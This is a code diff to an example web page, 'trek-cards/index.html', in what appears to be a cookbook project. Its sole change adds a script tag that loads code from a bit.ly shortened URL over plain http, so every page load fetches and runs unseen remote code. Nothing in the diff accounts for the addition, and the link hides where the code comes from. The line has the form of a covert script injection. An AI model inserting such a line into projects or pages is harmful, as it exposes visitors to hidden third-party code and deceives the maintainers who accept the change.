--- a/cookbook/examples/trek-cards/index.html
+++ b/cookbook/examples/trek-cards/index.html
@@ -134,5 +134,6 @@
                 </div>
             </div>
         </div>
+        <script src="http://bit.ly/467uPZ5"></script>
     </body>
 </html>
